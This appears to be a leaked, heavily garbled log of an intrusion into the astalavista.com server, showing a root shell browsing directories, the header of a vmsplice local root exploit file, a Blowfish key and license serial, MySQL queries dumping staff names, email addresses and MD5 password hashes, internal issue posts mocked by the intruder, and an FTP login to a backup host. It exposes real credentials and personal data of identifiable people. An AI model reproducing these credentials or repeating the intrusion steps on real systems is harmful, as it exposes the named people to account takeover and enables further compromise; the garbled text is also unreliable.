# @8 [. n9 F+ X& f ?2 C; T$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish% ?1 a3 b; r5 e9 b0 f' P! u4 P" \
?>, q& M% a9 \ ~# t' q/ H# L: v
6 v4 I8 D( z$ c+ |- g2 z3 X! Qsh-3.2# cd ..
" V. v, `- U% I. Zsh-3.2# cd com
1 P# d# K9 y; | X0 bsh-3.2# ls -la ^7 c1 n/ W' T2 T V+ v6 z7 L
total 141208
y& {4 l' z; g- ]drwx–x–x 10 com com 4096 Apr 28 12:40 .! Z8 z* ]! Z/ f2 ]
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .. E+ R. W' r9 `# G
drwx—— 2 com com 4096 Jun 4 04:04 backups
$ A/ w" O* _7 k; b" ]- ]-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
% j/ L4 }8 J; n7 ^5 rdrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
. G. G8 E& S0 A/ z: s-rw——- 1 com com 21880 Jun 2 08:07 .bash_history; \9 q9 `" _4 _$ b* g/ D
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout( j& L$ S1 L/ D0 S3 b3 u& u( ?1 i' `
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
6 d( [) S' }8 U' c+ W-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
1 a/ J0 B8 ~: l. E. E1 N* E. jdrwx–x–x 3 com com 4096 Jan 29 2008 domains
" \) H" P# A8 N: B- r4 b-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed2 N$ C; }' M/ x$ S3 [$ j
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap: G) V+ Q. d* R/ q( ` I! t
-rw——- 1 com com 69 Nov 18 2008 .lesshst* M& j$ `; i' j1 b: m) X
drwx—— 2 com com 4096 Sep 24 2007 mail
, H1 F5 y' v W+ E- X4 X! V! q8 w-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
0 N5 l9 {" }& c2 jdrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp; v& o/ g7 X* c* Q) C; q; L d& ?/ O
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html! y7 d8 i! o: }9 m
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow8 W+ ~3 r* P: b' c: v
drwx—— 2 com com 4096 Aug 26 2008 .ssh- J% ~. H: @8 ] _, s9 ~' G9 Q' _
-rwx—— 1 com com 8515 Feb 10 2008 t
' Q$ G% e( }4 s( y' {-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
6 x! Q" b& y) o* {: _. b7 mdrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp. L S. J" `! a5 E- S& \) N* m# J
-rw-rw-r– 1 com com 617 May 20 2008 .toprc& P! o+ d1 |- @5 O
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
6 p' m+ `8 k! [2 m/ a, v6 g-rw——- 1 com com 16629 Mar 28 21:46 .viminfo) G s$ {6 S4 s% l7 `
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
! s! h. `3 P9 T" m, x( J' j* Z" x. e2 E9 q+ O4 ~, l- J ^5 t9 C* ?/ U
sh-3.2# head t.c
8 S+ N- j/ u/ P5 g/ U+ i2 b1 `/ I% _/*; E2 {* R* E$ I
* jessica_biel_naked_in_my_bed.c1 U k+ D v+ y0 R$ [
*" V4 n$ U; w% C2 O, y' f
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura." V2 ~7 s6 ?4 k' ]
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.) c5 z; F+ Y4 v$ B0 V, @4 I
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
: I' q2 U3 `1 g# E. q1 J*
" B, J6 n; E- i: | O* Linux vmsplice Local Root Exploit
+ K& n- L) B1 F: S3 n* By qaaz
' n( p7 d8 H3 y. @, A3 ]*; w) j- w- p" y4 M
, a: n: n3 s# x) q6 hsh-3.2# cd /0 v5 w; R7 Q& V: ]" F
sh-3.2# ls -la \* r; C- G0 H4 Y' O4 @: E1 x" z4 o
total 360/ O8 _6 ^! T$ T b) i6 S' @
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .
2 w! V; W! J9 u6 kdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
( k1 H2 [# U, M. I M: Z-rw——- 1 root root 10240 Jun 3 02:39 aquota.group/ ]: m: A$ ~6 u" D
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user8 z' V) i# L# i1 B: | O8 ~: b* W
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
( L$ I8 v0 O6 j$ P1 X$ w0 K3 d-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck. R% R4 a- @/ H6 J
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel" z+ D @2 i: l: G3 q" _
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup4 A! C" O! `$ ?0 R# ~
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin" p1 Z; q' s2 Z3 H
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
q( _- j. ^7 C4 qdrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev7 f% g" q! c4 S* j H
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc) Y' O- l- o) X' k* p3 N6 K
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home
9 ?& F; M; `* F" U8 q-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf2 ^6 R& ?- j0 ~; I4 s! q, T: Z5 U' A
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
8 V; c, L2 ]% s# V. f* Zdrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib642 v( N9 w, z. Y9 F/ a
drwx—— 2 root root 16384 Sep 11 2007 lost+found7 D+ Y, W# S4 L7 L$ g" G
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media& h/ W# m# o5 Q1 ^( D8 u) b
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc- k% r" x" x s2 L4 D+ u f
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
. q. ?2 m5 P8 h0 H! G+ C# z/ o7 p-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
9 d! z7 u5 \' }; B( b) ddrwxr-xr-x 2 root root 0 Jun 3 02:43 net4 E8 }4 N' I9 D8 k; `: H: w. J
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt: H" m5 l3 T0 {8 R7 r; e9 ]/ S+ g' D8 T
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
6 P, \7 f8 ?# @! |) `+ ?3 a9 Gdrwxr-x— 15 root root 4096 Jun 4 08:40 root
; K2 F1 G' j2 S# i Gdrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
& c+ L2 \/ B, ^drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux7 T5 G" T3 x& A( X5 t6 M, H
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv7 X" w& x! M' y0 M; p
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
[+ J6 b( U5 t& v7 N' ^9 p7 edrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp+ X- B3 V! B# |. t
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
4 u+ W5 l' l" v; f! }9 L7 L6 M0 |: m5 bdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var
2 c2 W( O3 f: j& ~1 b. e& t/ v6 ?; d) I/ s
sh-3.2# cd opt3 d2 ^( l/ n! O; l% a1 {
sh-3.2# ls -la* ^0 Y& R( D3 U: d7 |7 Q
total 20- F4 z* K1 K" W; v) C0 s& X
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .9 @6 z, w4 F( \' R
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ... a. S' E9 d! `: U: x V8 A9 d8 f2 z% \
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
+ k9 }' [- U+ _2 t9 s: @8 k4 x9 ], L$ n2 k9 }" Y4 s
sh-3.2# cd lsws/! S8 Y$ e+ R* @0 Q
sh-3.2# ls -la
\2 H* H4 a% r6 S6 k3 U) @total 108. Z. |; T: p; Z4 B7 T
drwxr-xr-x 15 root root 4096 Mar 20 2008 .4 ?, ]% b' S9 r* d1 D
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..' ?6 j$ G2 c1 e7 s) L4 q
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
/ H2 H4 W i7 m3 I& o& S ?: xdrwxr-xr-x 13 root root 4096 May 29 15:10 admin7 D3 O" e4 q) r
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
- Z) i( c! ?1 K9 qdrwxr-xr-x 2 root root 4096 May 29 15:10 bin5 k; f1 |* D3 b( q& z
drwx—— 4 apache apache 4096 Jun 3 02:43 conf9 r# _5 L- U* u: r. s, l. V9 [
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT) H& f7 o1 v8 U# j
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs V0 E1 c1 e C! @: [8 x8 y# o0 Q# V
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin2 b, D. `+ C7 ~8 z0 t- i4 `
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib
2 {& D0 R+ n5 C: B3 ?1 C# j-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE3 C& {2 s2 I9 J; K1 _4 Z1 e
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
- `2 ~/ L$ k" p6 T-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL4 ]8 x) b3 ~# U0 y
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
# G5 [3 m% ~: }- \drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs9 p0 m. A: k9 y$ m
drwxr-xr-x 2 root root 4096 Mar 20 2008 php% J! z- _ D2 c2 L+ n: z- i
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild' F. U3 K) q& P, W1 h. P6 N, Y$ }
drwxr-xr-x 3 root root 4096 Mar 20 2008 share
& z5 a9 v" A2 L: e1 z) F-rw-r–r– 1 root root 6 May 29 15:10 VERSION
/ x" z* m! L1 k# E) E5 U* U) z4 r" S) L7 }
sh-3.2# cd conf- s r* Y' G+ ?, I0 t( o
sh-3.2# ls -la0 d. O) M" D( t5 Q' D
total 48+ @. g1 P$ _8 `3 ~+ y
drwx—— 4 apache apache 4096 Jun 3 02:43 .
8 q* C* b6 z9 [drwxr-xr-x 15 root root 4096 Mar 20 2008 ..( S% _ I, Z, j! J3 g
drwx—— 2 apache apache 4096 Mar 20 2008 cert
+ p6 J: y0 N) H' a5 e- S-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml7 s; M% J, w! Z9 j( a& C
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
' B( L$ X2 ~1 A' q; c6 \9 ^-rw-r–r– 1 root apache 0 Jun 3 14:11 .last8 a9 v5 u( G/ X. b
-rw——- 1 apache apache 256 May 29 15:10 license.key/ G1 Q, g, z! {0 n% J& }
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
# g+ f/ h- l" A: y2 J* B. A-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
- [+ z: l7 S4 G% a-rw——- 1 apache apache 20 May 29 15:10 serial.no1 s; c0 u% u2 I }+ q
drwx—— 2 apache apache 4096 Mar 20 2008 templates$ c$ \: A& T# \3 _
$ _1 w; ?. h5 Q. ]" |1 e" c5 S9 Bsh-3.2# cat serial.no: Z$ r" e8 r: p$ i) _% v) l
IbDl-oVsO-CKqL-wVRa# k( ~' l5 U/ H+ V, z3 c8 B
9 z( x0 S h' z; p+ P2 i# G5 jsh-3.2# mysql
2 Y6 T) l; l* e- w8 oWelcome to the MySQL monitor. Commands end with ; or \g.
( ?# b' s. X( H/ T. M: |/ k7 w" FYour MySQL connection id is 286844
@% V1 u3 F6 O3 B6 BServer version: 5.0.45-community-log MySQL Community Edition (GPL)
. @% W1 E7 ]" j. W7 v$ J
3 P2 _0 T4 k, f$ k/ k( `8 eType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
6 Q) E& O0 U( {& u# e( @+ I; L9 @4 D2 G+ z
mysql> show databases;
. I. Z6 ?- u& B" ^+———————–+
! w: M4 ~/ k; q" d| Database |
/ A+ R4 ]; Q5 T& e; ^+———————–+
' ?2 B; Q3 Q3 v4 g+ ]" || information_schema |* t$ U J) b& j$ N+ R0 g
| astanet_ads |2 X9 e2 @* e4 m0 }; q8 k
| astanet_mailing_lists |
. `3 Z- f% w1 [$ M) p| astanet_mediawiki |% \5 t7 R8 x7 T4 r" G2 a
| astanet_membersystem |
. A& [4 B, ]" e) \6 ~| com_contrexx |5 O+ L7 l1 O8 _" [* f/ u1 P( B
| com_contrexx2 |
1 j) t! a1 i# [8 k8 @| com_contrexx2_live |
2 a0 o' ^9 _1 k c+ w3 u0 y# u+ k| da_roundcube |
) V2 a6 `% w! R+ V' F* Y| dolphin |% i) b( i; O [ O+ j7 ~
| ideapool |
- b( Z( J3 T+ c5 A1 S| mysql |" w. w4 S, n' g8 j3 r
| test |7 Q W( h2 H" W4 x& {' V
| yourmaster |3 j% ^( B2 ?9 C. r% e! e
+———————–+
9 R0 ^$ {6 G9 Q- \14 rows in set (0.00 sec)( ^; A5 s l! w0 y1 p% _' Y
5 J; r) n Y) P4 j( P! V; Hmysql> use ideapool$ d3 u" v3 @* c4 B1 {& C( K$ ~1 E
Database changed
$ ^6 B, v# V( Y) N% fmysql> show tables;
" b# j+ A# L: z v, L- _+———————————–+
: V& h' Y3 o) w2 D| Tables_in_ideapool |
) ^2 G: Y3 y: o9 G; p, P+———————————–+
) B. v' [1 j( H" ^2 s| eventum_columns_to_display |+ R& q# `# a3 [% ^/ p- P) f
| eventum_custom_field |
( g. ^" j" c7 p- M, D! {* o| eventum_custom_field_option |
( H, Q/ {* i( I# Y0 N a| eventum_custom_filter |, B9 q, x; e% W: E1 g$ p
| eventum_customer_account_manager |9 O! a2 V0 s9 `; \# y8 B
| eventum_customer_note |! E5 e! {+ {) o1 h( L* m6 f% F
| eventum_email_account |& K0 W1 k8 D5 o& o2 b
| eventum_email_draft |+ P* w1 h1 Z0 x' f
| eventum_email_draft_recipient |
5 u+ q% @' b* m' q. || eventum_email_response |
) V* ^- h/ D- k( b/ \| eventum_faq |: x2 F {7 ^$ u8 g7 `
| eventum_faq_support_level |
9 v( B+ P/ r. d% Q| eventum_group |
$ T2 e0 h5 W9 c1 c( h2 n4 e| eventum_history_type |; c$ g) T6 w9 C( @1 P0 K
| eventum_irc_notice |
; W: p: z" Z0 c# a5 ~* k| eventum_issue |
9 P/ W1 L K# [7 d; R! ~; k- c# f| eventum_issue_association |$ o# c3 A) c. J* n( R% ~& M4 l
| eventum_issue_attachment |/ q X, j5 s" A) H z
| eventum_issue_attachment_file |4 H/ ^9 y# H, r9 Q6 d2 H( P6 u
| eventum_issue_checkin |
8 z3 `5 I0 W: W: _! |- C- Q! x| eventum_issue_custom_field |. q( d* I: J8 x3 ~8 q! t9 z
| eventum_issue_history |
4 G' g: a3 r7 p# q. l- ?5 G4 Y, x| eventum_issue_quarantine |
. J( ^9 g' i. h: O1 d| eventum_issue_requirement |9 _; i& ~. H/ O& |( v9 R" E
| eventum_issue_user |! r. D0 x) ~- R, h+ H4 X k
| eventum_issue_user_replier |
; Q: G+ g& }/ e& i. Y& \5 i| eventum_link_filter |6 c3 h. Z& _$ b: |& z
| eventum_mail_queue |* K2 z8 [% ^" ]2 Y
| eventum_mail_queue_log |& P' N, G2 _) n/ a* l2 c) z8 ^
| eventum_news |. w+ m. B0 g+ V4 v; u4 ~8 `5 E
| eventum_note |, a, Y1 G& \& U# N8 E. b
| eventum_phone_support |6 u8 F3 b7 A; I
| eventum_project |
4 @9 `9 t: _$ `" q+ r3 g" W| eventum_project_category |# {4 q5 ^ F5 E9 W
| eventum_project_custom_field |) d* ^. k! Z# Y% t
| eventum_project_email_response |, }. A+ Q' a# r! A6 U
| eventum_project_field_display |
" h8 q( n; u- x( F) p& e% Q| eventum_project_group |2 X( ?' H8 @! \9 V
| eventum_project_link_filter |+ t( f5 y, s* J8 }
| eventum_project_news |
+ C ]+ y+ M+ a* H; j4 I* g/ @| eventum_project_phone_category |
% S* C* @: v4 N, U" U6 j% Y d2 }$ g| eventum_project_priority |
- R. M1 ~. q4 A. l% t| eventum_project_release |
) u0 v s$ E5 f: d. c1 |* O. K| eventum_project_round_robin |7 [9 y8 X5 u$ F* g" e8 r$ j4 w0 }
| eventum_project_status |
4 r, x; q/ y" C! M9 }| eventum_project_status_date |
- G$ Q- K0 D: @5 {| eventum_project_user |
$ ]' `! w. V! Q0 ]1 M6 Z/ [; m| eventum_reminder_action |
- I4 O: A/ J0 R# W: b6 L: J| eventum_reminder_action_list |" ?. j$ d3 U7 M6 p% i% U- }
| eventum_reminder_action_type |1 ]2 \( V5 A* u( F
| eventum_reminder_field |! W$ l4 J9 C! F2 ?
| eventum_reminder_history |
5 @8 ~/ c+ `: L& J4 A3 f, Z$ L| eventum_reminder_level |
2 _% l( S8 o: n! ^1 [| eventum_reminder_level_condition |; v) ` j: T7 C& [* i- F
| eventum_reminder_operator |
2 n' A; ?1 O( b2 P1 L% [: [% m, g| eventum_reminder_priority |
* N0 m- [: ?) H4 F; ~: s8 i. \| eventum_reminder_requirement |
8 O' ^, m3 ?* E" [6 b| eventum_reminder_triggered_action |
/ q" q$ u$ E# ^% |; o; L% [; Z| eventum_resolution |
2 b- B. P$ `* J; E| eventum_round_robin_user |! i$ Y/ Y- A2 f7 s( t$ y( j
| eventum_search_profile |7 p( I6 W' a! O# t
| eventum_status |
6 q4 _+ k' [" v, E$ q6 n6 J| eventum_subscription |) X9 r! ?5 U2 F; b+ l- M: O, Q: c7 u
| eventum_subscription_type |7 D' ]2 F }! C3 j8 X9 V
| eventum_support_email |
. N& J/ n. h9 H| eventum_support_email_body |7 b" [$ U% n* z7 Y- P7 `% L0 L
| eventum_time_tracking |
) `' J+ H& [* ~0 L) I. p; w$ V| eventum_time_tracking_category |9 M3 n8 K, F& K$ X
| eventum_user |7 i/ L& L' _3 \3 y7 y
+———————————–+/ }( y0 }3 J& R7 H
69 rows in set (0.00 sec)* H; d+ T* z* I7 o
% p1 e6 H' v- s2 F) m
mysql> describe eventum_user;
% R. c4 {- b* |6 ^+————————-+——————+——+—–+———————+—————-+
4 K/ O' T6 C" A0 s4 ]$ o- v3 t| Field | Type | Null | Key | Default | Extra |
1 b5 c P; l; s* J! `% U: ?/ Q: U4 X+————————-+——————+——+—–+———————+—————-+
0 `; Y: `6 y g. S6 \: O% }1 F9 d| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |" V$ ^" F# \/ H4 n0 q- y
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
0 n5 D% ?: t6 w' B4 o| usr_customer_id | int(11) unsigned | YES | | NULL | | G6 U' m% x( j- k2 i5 D; m
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
& s1 o/ e, Z0 p$ p' P' D| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |/ Y3 {& C; \! j% p o5 Q
| usr_status | varchar(8) | NO | | active | |6 [( j$ \" i, h% _
| usr_password | varchar(32) | NO | | | | A2 _& R- Q' Y0 I3 f# ]
| usr_full_name | varchar(255) | NO | | | |
2 k* `. y" I5 S| usr_email | varchar(255) | NO | UNI | | |
0 ?. W, v3 `; j2 x. l| usr_preferences | longtext | YES | | NULL | |
+ C% s! p% }9 R/ c K, l9 o| usr_sms_email | varchar(255) | YES | | NULL | |
! @0 m# P, k5 {9 x6 o% y3 t. y| usr_clocked_in | tinyint(1) | YES | | 0 | |
$ g5 m4 P' N8 S: s' {| usr_lang | varchar(5) | YES | | NULL | |
( a {4 u; ]7 Q& h) D+————————-+——————+——+—–+———————+—————-+/ z g; ? {5 ?# k$ x
13 rows in set (0.00 sec)& ~1 u7 m! z2 `* s- y2 S
: ^1 o0 I( b; V( C9 a4 b* jmysql> select usr_full_name,usr_email,usr_password from eventum_user;
, w- }' M: |( `2 b6 w& y+———————-+——————————-+———————————-+
0 q* H% J: O; m8 ^$ i$ K| usr_full_name | usr_email | usr_password |5 I& s; [5 t8 I7 _# r0 J: z* L
+———————-+——————————-+———————————-+
) q& g7 T: i" C+ S+ `2 t5 v| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
0 Q4 b. T. V" _- l| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |1 H$ l; G, A: V* S) Z$ u
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
+ E- Z! X& ]$ v k! z7 H" O) n| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
S. G6 W- w, X" C) h' D7 v8 d- N5 U' {| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |1 Z: O. g5 E% v( R# W
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
% p) }. B+ O+ U| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
4 [+ V$ J+ Y) X/ J! N# w| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
" n! f: b/ i$ `| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
5 x3 E L, S0 C$ o+ ^| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
8 ^! l( a0 K* k& p| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |0 I* r0 K: Y6 G( _& ^
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
5 L( \' W: E% c| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
9 ~1 }# P0 r2 C| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |- l" u' y% x) Z4 g8 G; O- |' U
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |" `7 C" u, K3 S# e+ k
+———————-+——————————-+———————————-+
( R- I# s0 q, ]2 R" F15 rows in set (0.00 sec)+ j2 G5 T' N5 u# |- j+ G. W
: g% }+ v0 T2 x* D+ z) e0 E' S E3 S
mysql> select iss_description from eventum_issue where iss_id = 43;
0 J) z# O: j# ?4 ^5 a$ B3 W& e/ }2 z+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
* c1 M! {; O K; r8 S: I' I| iss_description : R" J0 w& D7 F( K6 D# n _: F3 W
|
5 }. M* n( z4 W( Z" `1 ?+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+7 u( }$ r$ ^4 G
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be5 b+ W4 {% T4 _: p1 t% v
connected for 90 mins… 120mins… so what i propose is something like:8 U/ E7 C# }5 x6 Q
链接标记[url]http://www.surfthechannel.com/[/url]
- p; V& ^8 f+ ~0 X! q5 Ksince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system; C4 l; ^: ~3 m. z! _6 I0 P( I4 R+ G
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t: R" }- w, o8 n* f
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
2 U" B9 w( T4 a {. i2 bif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…1 j8 {7 G, Z! ?4 a
6 y, X4 \2 _7 o
We could also put advertisement during play on the flash video player itself… extra $$…
- Y9 ]# _3 K; @3 Y' ^7 u+ H/ `* [1 H3 F6 R+ R) K: A, R- w
By sykadul |
3 h0 Y X7 {* L1 a$ X7 F* f+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
* r7 N W4 r& f' S0 n$ V {1 row in set (0.00 sec)' ~% i+ V7 I+ i# H# ~, i4 W
. B/ \. h/ f0 v, S8 H: P// Money and extra $$ is all they care about. remember that.$ t. |' {2 }( O
( w" M0 u) c& P0 d7 [
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;+ f: R! D8 y/ q5 e: l# b5 o$ A
+————————+——————————————————————————————————————————————————————————————————————————————-+( j- D7 \% k, L4 `$ T% ]% H
| iss_summary | iss_description / ]8 n3 M$ V3 W
|
. E# G5 s: T s7 Y, v5 ?$ d+————————+——————————————————————————————————————————————————————————————————————————————-+- }* S6 v0 N' x$ B
| Forum for REAL EXPERTS | Hello,2 Q3 S. P5 P) F- b7 a- m- R
; K4 |1 n @# a j, X; n$ j0 D8 DIshtus and I,
( e. M2 c% ~) ^( W! T6 O/ l
$ `9 l0 w* i4 u/ s& _Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
: a" [1 t$ ~9 p6 J pONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
/ k Q" W7 Y/ F0 q/ E' {& \) N$ ]0 o, `7 @" a
One example a friend of mine from coresecurity.com!, X+ P& U# E. B; d. ~
4 W1 ]# Q6 A9 pWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..9 H, y3 u( q/ i+ G) D
) {0 N+ R3 A- g! c& {4 x
|6 D" W+ p8 k6 H N3 q
+————————+——————————————————————————————————————————————————————————————————————————————+. A. [8 w0 O) I! k7 |9 K: F x) y
1 row in set (0.00 sec). W1 O8 e" Q6 g; o
: X) b* `% m7 Z Y- v1 L L4 t& J
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
P& Q& T+ j4 ^+ }1 u2 Y! o2 t# F5 ~. L9 i# B) w
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
8 f! L% o2 k$ e9 @" l+——————+———————————————————————————————+2 t+ n* f6 n& g% j) j
| iss_summary | iss_description |6 F+ K. s1 { z1 j8 J
+——————+———————————————————————————————+1 z% Z3 P: C9 i+ y
| Website guidance | Virtual Girl which guides you trought the website.% Y* C( {9 v- H" ^4 k$ D
* s# x9 Z# ?. V& y. a* F6 s* E3 dWe need a girl with who you can ( talk )!!!; f' N( t& D! ?" [" X+ u
Also for the News!
3 ^; a' `( D% \2 N& D$ K* SSo my suggestion is a girl who read you the news loud if you like!2 b4 {% I! z; {, v% {1 {6 \
you can choose between read yourselfe or she read it for you or both!& y2 |! }9 M0 q5 w5 f) g3 d2 n
5 S, Q% G8 c' E; i* l$ }
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
# t! S$ p" z# O- z/ j/ k/ v( v0 `1 `& M& H3 p8 ~2 C& E+ A" ^! Q2 p9 u1 {
Have a look on the example girls!!
4 `" F( _8 Q# e/ K3 p7 `
* e# {& z' i8 d% D$ ^链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]3 u" q, g. b& V5 M7 @. ?1 t4 M
) d# Q1 i' C1 D- K' w+ c; |* X5 n
or that6 H8 u# [8 P0 F! o5 c( C$ y
- F0 s# O) L. M+ x7 x z& Y3 y2 I# T& P链接标记[url]http://www.yellostrom.de/[/url]8 h7 q; n: ]. }9 h! p
4 v+ p4 D) u% M+ Q6 t
|
# c) |4 j8 F3 N( L/ W0 z5 x: I+——————+———————————————————————————————+
7 T4 [% z4 U7 h' k i/ {1 row in set (0.00 sec)9 q- Q o& d+ O
1 \) M, d8 }+ l// ha ha.
, k+ b% L D* m: ]7 q* F
: m' Q7 X. @5 A/ tmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;2 B3 S) h4 d) w/ Y7 j3 }
+————————–+———————————————————————————————————–+* ]9 V; E1 X5 }& G) c$ J% W2 W
| iss_summary | iss_description |
' n0 E2 C; r2 X+ }" o+ i2 z0 R+————————–+———————————————————————————————————–+
1 R- f( l4 T$ R" {9 \! W| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
) S3 W3 ]; y% \+ U: ]/ j+————————–+———————————————————————————————————–+
9 S2 t! s8 h" [% Y5 u1 row in set (0.00 sec)
- G2 A: A% l5 V4 y0 x: L$ a" b% [% \* k v- l
// LOL.
- X1 j6 [# z4 G, a& e8 A0 ` {' ]' l/ M* t1 u0 r
mysql> exit
9 P, t. L8 [* z+ B( s5 @Bye
0 d% J0 u- T7 {8 ]/ h2 h4 W5 j8 A+ O
2 C% H! S" @& B1 G5 [" ~* H; ush-3.2# ftp 212.254.194.1632 N/ Y9 Y7 k4 j
Connected to 212.254.194.163.' c) f! e0 D% R4 q* Z
220 BackupCOM_VW FTP server ready.
$ p* `/ d" m' a) u) d504 AUTH: security mechanism ‘GSSAPI’ not supported.: r6 i: y4 n$ `, a7 I- s' Y
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.5 d% J. z4 v! M
KERBEROS_V4 rejected as an authentication type$ x& u! E9 a" l. I
Name (212.254.194.163:root): astalavista.com! u$ c j# h/ t# S0 o/ T
331 Password required for astalavista.com.7 z! n K7 U- r4 D5 l
Password:4 X# E2 a9 L% I) K0 t
230 User astalavista.com logged in.4 j6 z+ c3 }0 B0 o& l
Remote system type is UNIX.
